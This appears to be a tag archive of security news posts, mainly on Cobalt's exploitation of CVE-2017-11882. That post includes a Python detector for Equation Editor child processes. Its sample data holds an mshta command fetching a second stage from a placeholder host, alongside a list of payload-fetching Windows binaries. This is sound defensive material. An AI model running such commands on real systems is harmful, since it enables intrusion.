exploiting


Maze Ransomware Exploiting Exploit Kits

Source: National Cyber Security – Produced By Gregory Evans

Cybercrime has never been one to hem in its tactics with ideology or rules. Rather, malware operators are known to use what works and then modify code so that it keeps working. By “work,” we mean that the code does what it is supposed to do; for information stealers, […]

A #Hacking Group Is #Already #Exploiting the #Office #Equation Editor #Bug

Source: National Cyber Security – Produced By Gregory Evans

A week after details about a severe Microsoft Office vulnerability came to light, at least one criminal group is now using it to infect users.

The group is not your regular spam botnet, but a top cyber-criminal operation known to security researchers as Cobalt, a hacking outfit that has targeted banks, ATM networks, and financial institutions for the past two years.

CVE-2017-11882 used by Cobalt hacking group

According to Reversing Labs, a UK-based cyber-security firm, the Cobalt group is now sending high-value targets RTF documents laced with exploits for CVE-2017-11882.

This is a stack buffer overflow in the Office Equation Editor component (EQNEDT32.EXE) that lets an attacker execute code on a victim’s computer as soon as the victim opens a crafted document; no further interaction, such as enabling macros, is required.

You don’t need a grizzled veteran of the infosec community to tell you that a vulnerability with such results would be incredibly valuable for any cyber-criminal organization.

Besides the damage this vulnerability can do, Cobalt’s quick adoption of CVE-2017-11882 was most likely aided by the availability of four proof of concept (PoC) exploits that have been published online in the past week [1, 2, 3, 4].

According to Reversing Labs, the Cobalt group is currently sending emails carrying a booby-trapped RTF file that uses a CVE-2017-11882 exploit to download and run additional malicious files. The infection chain goes through multiple stages, but in the end it downloads and loads a malicious DLL that has yet to be analyzed in more depth.
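The process-creation pattern this chain produces is the most reliable thing to hunt for on endpoints: Equation Editor is launched by Office as an out-of-process COM server and has no legitimate reason to create child processes, so EQNEDT32.EXE spawning anything at all points at exploitation of CVE-2017-11882 (or a sibling Equation Editor bug) running a downloader stage. The following Python is an added example, not code from the original article or from ReversingLabs; its event records mimic Sysmon Event ID 1 fields, and every host name, path and URL in it is constructed for illustration.

```python
"""Flag Equation Editor (EQNEDT32.EXE) spawning child processes.

Added example, not code from the original article or from ReversingLabs.
Equation Editor is started by Office as an out-of-process COM server and
normally never creates child processes, so a child under it is a strong
sign that an exploit such as CVE-2017-11882 has launched a downloader
stage. Event fields mimic Sysmon Event ID 1 (ProcessCreate); all hosts,
paths and URLs below are constructed sample data, not real telemetry.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessCreate:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


# Living-off-the-land binaries that maldoc exploits typically use to fetch and
# run the next stage; one of these under Equation Editor is rated critical.
HIGH_RISK_CHILDREN = {
    "cmd.exe", "powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe", "msiexec.exe",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessCreate) -> str:
    """'critical' for a LOLBin child of EQNEDT32.EXE, 'high' for any other
    child of it, 'none' when Equation Editor is not the parent."""
    if basename(ev.parent_image) != "eqnedt32.exe":
        return "none"
    return "critical" if basename(ev.image) in HIGH_RISK_CHILDREN else "high"


def detect(events: List[ProcessCreate]) -> List[Tuple[str, str, str, str]]:
    """Return (host, timestamp, severity, command_line) for each suspicious event."""
    alerts = []
    for ev in events:
        severity = classify(ev)
        if severity != "none":
            alerts.append((ev.host, ev.timestamp, severity, ev.command_line))
    return alerts


EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed sample telemetry (hypothetical host, user and URL).
SAMPLE_EVENTS = [
    # Normal: Word starts Equation Editor to render an embedded OLE object.
    ProcessCreate("2017-11-21T09:14:02Z", "WS-FIN-07",
                  r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
                  EQNEDT, f'"{EQNEDT}" -Embedding'),
    # Exploit chain: Equation Editor spawns cmd.exe to pull a second stage.
    ProcessCreate("2017-11-21T09:14:03Z", "WS-FIN-07", EQNEDT,
                  r"C:\Windows\System32\cmd.exe",
                  "cmd.exe /c mshta hxxp://example.invalid/stage2.hta"),
    # Unknown binary written to the user profile and launched by Equation Editor.
    ProcessCreate("2017-11-21T09:14:05Z", "WS-FIN-07", EQNEDT,
                  r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe",
                  r"C:\Users\jdoe\AppData\Local\Temp\svchost.exe"),
    # Unrelated activity: regsvr32 from the desktop shell is not this rule's concern.
    ProcessCreate("2017-11-21T09:20:11Z", "WS-FIN-07",
                  r"C:\Windows\explorer.exe",
                  r"C:\Windows\System32\regsvr32.exe",
                  r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"),
]


if __name__ == "__main__":
    for host, ts, sev, cmd in detect(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {host} {ts} {cmd}")
```

The rule deliberately does not whitelist by child name: the "high" tier catches a dropped executable with an arbitrary name, while the LOLBin set only raises the severity. The benign WINWORD.EXE → EQNEDT32.EXE launch is left alone, since that is exactly how Office renders a legitimate equation object.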

Proofpoint researcher Matthew Mesa also saw the same emails, but observed a slightly different exploitation chain.

Cobalt has jumped on Microsoft bugs before

As for the Cobalt group, they have a history of jumping on Microsoft bugs as soon as they’re disclosed and weaponizing them for their campaigns. The same thing happened with CVE-2017-8759, a remote code execution vulnerability that affected the .NET Framework, patched by Microsoft in the September 2017 Patch Tuesday.

Security firms first started documenting the Cobalt group in 2016, when it was spotted hitting ATMs and financial institutions across Europe. The group then spread to targets in the Americas, and later also targeted Russian banks, using the ex-Soviet space as a testing ground for new attacks, before it moved to more wealthy targets elsewhere.

The group takes its name from Cobalt Strike, the commercial penetration-testing framework whose components it uses in its intrusions; Cobalt Strike itself is a legitimate product, not the group’s own malware.

Patch now, before vulnerability is exploited en masse

As we’ve seen in the past, it doesn’t take too long for a vulnerability to trickle down from professional cyber-criminal groups to spam botnet herders once public PoCs are available.

Users should apply the Microsoft Office updates KB2553204 (Office 2007), KB3162047 (Office 2010), KB4011276 (Office 2013) and KB4011262 (Office 2016), released in the November 2017 Patch Tuesday, to guard against CVE-2017-11882 exploitation. Where patching is delayed, Microsoft’s advisory also documents a registry workaround that disables the Equation Editor COM object (Compatibility Flags set to 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}), at the cost of breaking legacy equation objects in existing documents.

 

The post A #Hacking Group Is #Already #Exploiting the #Office #Equation Editor #Bug appeared first on National Cyber Security Ventures.


Fancy Bear #hackers are now #exploiting the #New York terror attack to #spread their #malware

Source: National Cyber Security – Produced By Gregory Evans


As the US Justice Department forges ahead with its investigation into the Trump administration and any possible collusion with Russia, the Fancy Bear hackers continue refining their attacks against global targets. In their latest phishing campaign, the hackers are capitalising on the recent New York terror attack to trick users into opening malicious documents that infect their systems with malware.

The Kremlin-linked hackers first made headlines during the 2016 US presidential campaign and are now widely considered to have orchestrated the cyberattacks against the US Democratic Party. The cyberespionage group has since been actively involved in various campaigns over the past year, targeting organisations and individuals across the globe.

Fancy Bear’s most recent campaign, uncovered by security researchers at McAfee, uses a blank malicious document titled “IsisAttackInNewYork” which, when opened, drops the group’s first-stage reconnaissance implant, Seduploader; the document relies on Office’s DDE feature rather than a macro to launch it. The implant collects basic data from infected PCs and profiles prospective victims. Once the hackers judge a victim to be of interest, the implant drops Fancy Bear’s customised malware, X-Agent or Sedreco.

The post Fancy Bear #hackers are now #exploiting the #New York terror attack to #spread their #malware appeared first on National Cyber Security Ventures.


Hackers Exploiting ‘Find My iPhone’ To Remotely Lock Mac Computers

Source: National Cyber Security – Produced By Gregory Evans

Apple’s Find My iPhone feature is meant to be a recovery tool of sorts: if you have misplaced your iPhone, you can use it to locate the device. Unfortunately, it seems that in recent times hackers have managed to abuse the feature and have been locking…

The post Hackers Exploiting ‘Find My iPhone’ To Remotely Lock Mac Computers appeared first on National Cyber Security Ventures.


Smithton man to serve 30 years for sexually exploiting 6-year-old girl

A 40-year-old Smithton man was sentenced to 30 years in prison Friday for child pornography and sexual exploitation of a child.

A release from U.S. Attorney Donald Boyce’s office stated that Kyle Oberg was found to have taken 337 images of a 6-year-old girl engaging in sexually explicit behavior.

An investigation into Oberg was launched when the girl’s mother reported to the Smithton Police Department that the man was acting suspiciously.

On July 18, 2013, police searching Oberg’s home found evidence that between Dec. 8, 2012 and June 29, 2013 the man took 337 images on 24 separate occasions of the 6-year-old girl.


The post Smithton man to serve 30 years for sexually exploiting 6-year-old girl appeared first on Parent Security Online.


Google: hackers still exploiting Windows ‘critical’ flaw


Source: National Cyber Security – Produced By Gregory Evans


Although Adobe has worked to fix flaws found by Google, Microsoft has yet to act

Google has warned that a zero-day vulnerability still exists in Windows, despite it being almost a week since Microsoft was first notified of the problem.

The post Google: hackers still exploiting Windows ‘critical’ flaw appeared first on National Cyber Security Ventures.


Hacker arrested by Canadian Police for exploiting HeartBleed Bug

A 19-year-old man has been arrested and charged by Canadian police for allegedly exploiting the Heartbleed bug to steal personal data from the Canada Revenue Agency’s website.

The arrest of Stephen Arthuro Solis-Reyes, who allegedly grabbed about 900 social insurance numbers (SINs) over a period of six hours, marks the first time that authorities have apprehended someone in connection with the OpenSSL bug.

Solis-Reyes, of London, Ontario, is a student at Western University. He was detained by the London Police Service and the Royal Canadian Mounted Police National Division Integrated Technological Crime Unit.

In a statement, Assistant Commissioner Gilles Michaud of the RCMP, said:
The RCMP treated this breach of security as a high priority case and mobilized the necessary resources to resolve the matter as quickly as possible. Investigators from National Division, along with our counterparts in “O” Division have been working tirelessly over the last four days analyzing data, following leads, conducting interviews, obtaining and executing legal authorizations and liaising with our partners.

He is scheduled to appear in court in Ottawa on 17 July 2014.

Canada’s tax agency was one of the first major organizations to be impacted by the Heartbleed flaw and subsequently had to remove public access to its online services for four days in order to protect taxpayer information.

It’s unclear what Solis-Reyes’s motivations were. But it’s important to remember that while security researchers and other interested parties may like to think that testing for Heartbleed or other vulnerabilities is ethical and useful, the law may not agree.

Such activity may not be regulated in every nation, but some countries certainly do prohibit the testing of security on third-party websites without permission.

Furthermore, it should be obvious that actually exploiting any discovered vulnerabilities in order to gain unauthorized access to networks and data is a bad idea at all times. More so if the organization in question is your national tax office.

If you do have legitimate concerns about a website’s security, the correct course of action would be to notify the owners and engage in responsible disclosure in a manner that doesn’t place other people’s data at jeopardy.

Source: http://whogothack.blogspot.co.uk/2014/04/hacker-arrested-by-canadan-police-for.html#.VjacTfmqqko

The post Hacker arrested by Canadian Police for exploiting HeartBleed Bug appeared first on Am I Hacker Proof.
